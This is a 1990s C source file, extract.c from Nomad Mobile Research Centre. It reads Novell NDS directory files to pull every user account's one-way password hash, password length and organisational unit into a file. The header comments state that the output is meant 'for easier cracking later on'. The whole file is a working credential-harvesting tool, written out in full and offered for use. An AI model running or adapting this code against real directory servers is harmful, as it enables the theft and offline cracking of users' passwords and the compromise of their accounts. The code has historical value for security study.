/*************************************************************************
 *                                                                       *
 * extract.c  - extracts one way encrypted passwords from NDS            *
 *                                                                       *
 * Programmer - Simple Nomad - Nomad Mobile Research Centre              *
 *                                                                       *
 *-----------------------------------------------------------------------*
 *                                                                       *
 * 6/6/97     - Initial Revision                                         *
 *                                                                       *
 *-----------------------------------------------------------------------*
 *                                                                       *
 * 6/10/97    - Completed program.                                       *
 *                                                                       *
 *-----------------------------------------------------------------------*
 *                                                                       *
 * 6/13/97    - Added support for PASSWORD.NDS records.                  *
 *                                                                       *
 *-----------------------------------------------------------------------*
 *                                                                       *
 * 6/15/97    - Completed work on PASSWORD.NDS records. Expanded to      *
 *              include parent ID and a self offset field to allow for   *
 *              easier cracking later on.                                *
 *                                                                       *
 *-----------------------------------------------------------------------*
 *                                                                       *
 * 6/28/97    - Switched the int used for record counting to a long to   *
 *              allow converting huge BACKUP.DS with tons of records.    *
 *              Added an endian conversion routine. This should be used  *
 *              if a copy of ENTRY.NDS, BLOCK.NDS, and VALUE.NDS are     *
 *              retrieved from a little endian server, but extract is    *
 *              being run on a big endian box. If convert was run on a   *
 *              big endian box, then do not compile with the -DENDIAN    *
 *              option.                                                  *
 *                                                                       *
 *************************************************************************/

/*
 * Send bugs to pandora@nmrc.org.
 *
 * Known bugs - there is an obit value to show that a record is "deceased".
 * EXTRACT currently prints deceased accounts as well as working and
 * disabled ones. This could be confusing. Not a bug really, but a "feature".
 *
 * To get around some byte alignment problems between Unix and DOS compilers,
 * I am not using sizeof(struct) anywhere in structures or during reads and
 * writes to files. Not great C coding style, but now only one version of code
 * has to exist. My goal was to compile as simply as possible, this eliminated
 * the need for a special make file to account for different compilers.
 */

/*
 * Includes
 */
#include <stdio.h>
#include <stdlib.h>

/*
 * Typedefs for program
 */
typedef unsigned long uint32;
typedef unsigned int  uint16;
typedef unsigned char uint8;
typedef unsigned int  unicode;

/*
 * Global constants
 */
#define TRUE 1
#define FALSE 0
#define SYS_CLASS 0xffffffffL
#define MAX_CHARS 128

/*
 * Global variables
 */
uint32 USER_CLASS;
uint32 P_KEY;
uint32 passwordOffset;
FILE *fEntry;
FILE *fValue;
FILE *fBlock;
FILE *fPassword;

/*
 * struct for ENTRY.NDS records
 */
typedef struct entry
{
	uint32          selfOffset;    /* Offset in ENTRY.NDS. If this is
					  the first record, it is 0x00000000
					  followed by 0x0000014e for the
					  second record, etc. */
	uint32          checkSum;      /* I assume a checksum */
	uint32          val1;          /* Unsure, usually 0xfeffffff. */
	uint32          val2;          /* Unsure, usually 0xffffffff. */
	uint32          peer;          /* Offset to a peer record. */
	uint32          firstChild;    /* Offset to first child record. If
					  no kids, 0xffffffff. */
	uint32          lastChild;     /* Offset to second child record.  If
					  no kids, 0xffffffff. */
	uint32          firstValue;    /* Offset in VALUE.NDS of first
					  attribute. They are usually kept
					  in order in VALUE.NDS, but since
					  they are crossed referenced in
					  VALUE.NDS they don't have to be.*/
	uint32          id;            /* The Object ID of the record. */

	uint32          partitionID;   /* The partition ID of the record.  */
	uint32          parentID;      /* The parent's Object ID, if no
					  parent it is 0xffffffff. */
	uint32          val3;          /* No idea. Usually a small number.*/
        uint32          val4;          /* No idea. 0x00000000. */
	uint32          subordinates;  /* Number of subordinates. This can
					  include other objects besides
					  children. */
	uint32          classID;       /* The "type" of Object ID. */
	uint32		creatTime1,    /* When object was created. */
			creatTime2;
	uint32		modTime1,      /* When object was last modified.  */
			modTime2;
	uint8           name[258];     /* Dreaded unicode describing
				          the record. If a user object
				          it will be the common name.  */
} ENTRY; /* size=334 */

/*
 * struct for VALUE.NDS records
 */
typedef struct value
{
	uint32          selfOffset;    /* Offset in VALUE.NDS. If this is
					  the first record, it is 0x00000000
					  followed by 0x00000040 for the
					  second record, etc. */
	uint32          checkSum;      /* I assume a checksum */
	uint32          val1;          /* Unsure, usually 0xfeffffff. */
	uint32          val2;          /* Unsure, usually 0xffffffff. */
	uint32          nextVal;       /* The next Value record's offset.  */
	uint32          firstBlock;    /* Offset in BLOCK.NDS if used. */
	uint32          entryID;       /* Type of record in ENTRY.NDS. */
	uint32          typeID;        /* Type of VALUE record. */
	uint32          val3;          /* No idea. Usually a small number.*/
	uint32          creatTime1,    /* When object was created(?). */
			creatTime2;
	uint32          length;        /* Length of data. */
	uint8           data[16];      /* Start of data, unless there is a
					  small amount of data, then it's
					  all here. */
} VALUE; /* size=64  */

/*
 * struct for BLOCK.NDS records
 */
typedef struct block
{
	uint32          selfOffset;    /* Offset in BLOCK.NDS. If this is
					  the first record, it is 0x00000000
					  followed by 0x00000080 for the
					  second record, etc. */
	uint32          checkSum;      /* I assume a checksum */
	uint32          val1;          /* Unsure. */
	uint32          nextBlock;     /* Next record if data>120. */
	uint32          valueOffset;   /* Offset in VALUE.NDS (backlink) */
	uint8           data[120];
} BLOCK; /* size=128 */

/*
 * struct for PARTITION.NDS records
 */
typedef struct partition
{
	uint32          selfOffset;    /* Offset in PARTITIO.NDS. If this is
					  the first record, it is 0x00000000
					  followed by 0x00000028 for the
					  second record, etc. */
	uint32          checkSum;      /* I assume a checksum */
	uint32          val1;          /* Unsure. */
	uint32          id;            /* ID of record. */
	uint32          entryID;       /* ID in ENTRY.NDS */
	uint32          replicaID;     /* Replica ID (??) in ENTRY.NDS */
	uint32          val2;          /* Unsure. */
	uint32          val3;          /* Unsure. */
	uint32          timeStamp1,    /* Probably used to keep things in sync */
			timeStamp2;
} PARTITIO; /* size=40 */

/*
 * struct for PASSWORD
 */
typedef struct password 
{
	uint32          selfOffset;	/* Offset in PASSWORD.NDS. If this is
					   the first record, it is 0x00000000
					   followed by 0x0000014e for the
					   second record, etc. */
	uint32		id;		/* Object ID from ENTRY */
	uint32		parentID;	/* Parent ID */
	uint32		objectID;	/* Object ID from Private Key */
	uint32		pwlen;		/* Password length of user account */
	uint8		hash[16];	/* One-way hash */
	uint8           userOU[40];     /* OU of User */
	uint8		userCN[258];    /* User common name */
} PASSWORD; /* size=334 */

#ifdef ENDIAN
union
{
  uint32 longData;
  uint8 shortData[4];
} output;

union
{
  uint32 longData;
  uint8 shortData[4];
} input;
#endif

/*
 * This union is needed as we need to read in four bytes from the
 * private key and write them out as a long.
 */
union
{
    uint8 inBytes[4];
    uint32 asLong;
} ID;

/*
 * This routine switches byte ordering to get around the big 
 * endian -- little endian problem. I did this because systems
 * like AIX offer no solutions for a big endian reading a little
 * endian created fileSend it a uint32 and it returns the 
 * converted uint32.
 */
#ifdef ENDIAN
uint32 make_conversion(uint32 k) {
  int i;
  uint32 j;
  
  input.longData=k;
  for (i=0; i<4; i++)
    output.shortData[i]=input.shortData[3-i];
  return(output.longData);
}
#endif

/*
 * Close all open files. If not open it doesn't try to close since
 * this will core dump.
 */
void CloseNDS(void)
{
  if (fEntry) fclose(fEntry);
  if (fValue) fclose(fValue);
  if (fBlock) fclose(fBlock);
  if (fPassword) fclose(fPassword);
}

/*
 * Open the three NDS files we will use, and a fourth to write out
 * password information to.
 */
int OpenNDS(void)
{
   fEntry=fopen("ENTRY.NDS","rb");
   fValue=fopen("VALUE.NDS","rb");
   fBlock=fopen("BLOCK.NDS","rb");
   fPassword=fopen("PASSWORD.NDS","wb");
   if (!(fEntry && fValue && fBlock && fPassword))
   {
      CloseNDS();
      return 1;
   }
   printf("Opening NDS files...\n");
   return 0;
}

/*
 * Dump unicode to screen. I dislike unicode a lot, but this routine
 * skips the 0x00's and only prints the parts that matter.
 */
void printUnicodeName(char *name, int j)
{
   int i;
   for (i=0;i<j;i++)
   {
     if (name[i]!=0) putchar(name[i]);
   }
}

/*
 * This routine counts the number of ENTRY.NDS records and returns the
 * value. Return j-1 to adjust for extra zero count record.
 */
long int countEntryRecords(void)
{
   long int j;
   uint32 k;
   ldiv_t calc;
   fseek(fEntry,334,SEEK_END);
   k=ftell(fEntry);
   calc=ldiv(k,334);
   j=calc.quot;
   return(j-1);
}

/*
 * This routine counts the number of VALUE.NDS records and returns the
 * value. Return j-1 to adjust for extra zero count record.
 */
long int countValueRecords(void)
{
   long int j;
   uint32 k;
   ldiv_t calc;
   fseek(fValue,64,SEEK_END);
   k=ftell(fValue);
   calc=ldiv(k,64);
   j=calc.quot;
   return(j-1);
}

/*
 * This routine counts the number of PASSWORD.NDS records and returns the
 * value. Return j-1 to adjust for extra zero count record.
 */
long int countPasswordRecords(void)
{
   long int j;
   uint32 k;
   ldiv_t calc;
   fseek(fPassword,334,SEEK_END);
   k=ftell(fPassword);
   calc=ldiv(k,334);
   j=calc.quot;
   return(j-1);
}

/*
 * This routine scans through ENTRY.NDS records and looks for the object
 * ID of the User object and the Private Key. They are written to globals.
 */
void findObjectIDs(long int j)
{
   ENTRY pEntry;

   rewind(fEntry);
   while(j!=0)
   {
     fread(&pEntry,334,1,fEntry);
     if(pEntry.classID==0xffffffff)
     {
       if(pEntry.name[0]==0x55 && pEntry.name[2]==0x73 && pEntry.name[4]==0x65 && pEntry.name[6]==0x72)
	 USER_CLASS=pEntry.id;
       if(pEntry.name[0]==0x50 && pEntry.name[2]==0x72 && pEntry.name[4]==0x69 && pEntry.name[6]==0x76)
	 P_KEY=pEntry.id;
     }
     j--;
   }
   printf("\nUser Object ID is %lx\nPrivate Key Object ID is %lx\n",USER_CLASS,P_KEY);
}

/*
 * Main prog...
 */
void main(void)
{
   ENTRY pEntry;
   VALUE pvalue;
   BLOCK pblock;
   PASSWORD pPassword;
   uint32 f;
   int i,t,FOUND;
   long int j,k,x,y;
   ldiv_t calc;

   passwordOffset=0;

   /* Open NDS and password target file */
   if (OpenNDS())
   {
      perror("Directory Services");
      exit(1);
   }
   /* Count ENTRY.NDS and VALUE.NDS records */
   j=countEntryRecords();
   x=j; /* Save for later */
   k=countValueRecords();

   /* A lot of user accounts and things could take a long time... */
   printf("Dealing with %ld ENTRY records and %ld VALUE records,\n please be patient...\n",j,k);

   /* Scan for object IDs we need */
   findObjectIDs(j);

   rewind(fEntry);

   /* Main loop. If a user is found, print the CN and object ID to the
    * screen and a file. Then get the password length
    * and one-way encrypted password hash.
    */
   while(j!=0)
   {
     fread(&pEntry,334,1,fEntry);
     if (pEntry.classID == USER_CLASS) /* Is record a user? */
     {
       FOUND=FALSE;
       for (i=0;i<258;i++) pPassword.userCN[i]=pEntry.name[i];
       pPassword.selfOffset=passwordOffset;
       pPassword.id=pEntry.id;
       pPassword.parentID=pEntry.parentID;
       rewind(fValue);
       for(i=0;i<k;i++)
       {
	 fread(&pvalue,64,1,fValue);
	 if(pvalue.entryID==pEntry.id && pvalue.typeID==P_KEY)
	 {
	   FOUND=TRUE;
	   for (t=0;t<4;t++) ID.inBytes[t]=pvalue.data[t];
	   pPassword.objectID=ID.asLong;
	   pPassword.pwlen=pvalue.data[4];
	   for (t=8;t<16;t++) pPassword.hash[t-8]=pvalue.data[t];
           f=pvalue.firstBlock;
#ifdef ENDIAN
           f=make_conversion(f);
#endif
	   fseek(fBlock,f,SEEK_SET);
	   fread(&pblock,128,1,fBlock);
	   for (t=0;t<8;t++) pPassword.hash[t+8]=pblock.data[t];
	 }
       }
       if (FOUND==TRUE) /* Did user have a private key? */
       {                /* If so, write it out and update the
			   pointer for the next offset. */
	 fwrite(&pPassword,334,1,fPassword);
	 passwordOffset += 334;
       }
     }
     j--;
   }

   /* Close things up... */
   CloseNDS();

   /* Secondary loop. We assess and get OUs into password records
      by getting the parentID of each user and looking up the
      name. The name is copied into the password record. */
   passwordOffset=0L;
   fPassword=fopen("PASSWORD.NDS","r+b");
   fEntry=fopen("ENTRY.NDS","rb");
   if (!(fEntry && fPassword))
   {
      fclose(fPassword);
      fclose(fEntry);
      exit(1);
   }

   j=countPasswordRecords();
   y=x;
   printf("Dealing with %ld PASSWORD records and %ld ENTRY records,\n please be patient...\n",j,x);

   while (j!=0)
   {
     fseek(fPassword,passwordOffset,SEEK_SET);
     fread(&pPassword,334,1,fPassword);
     while(x!=0)
     {
       fread(&pEntry,334,1,fEntry);
       if(pEntry.id==pPassword.parentID)
       {
	 for (i=0;i<40;i++) pPassword.userOU[i]=pEntry.name[i];
	 x=1;
       }
       x--;
     }

     /* If you deal with large password files, you may wish to comment
	this section out (screen stuff wastes CPU). But run this program
	as "./extract > tempfile" and you'll end up with a nice text
	file containing the account names, hashes, etc. */

     printUnicodeName(pPassword.userCN,258);
     printf(" ");
     printUnicodeName(pPassword.userOU,40);
     printf(" %08lx %d ",pPassword.objectID,pPassword.pwlen);
     for (i=0;i<16;i++) printf("%02x",pPassword.hash[i]);
     printf("\n");
     /* end of screen stuff */

     x=y;
     fseek(fPassword,passwordOffset,SEEK_SET);
     fwrite(&pPassword,334,1,fPassword);
     rewind(fEntry);
     passwordOffset += 334;
     j--;
   }
   printf("\n");
   exit(0);
}



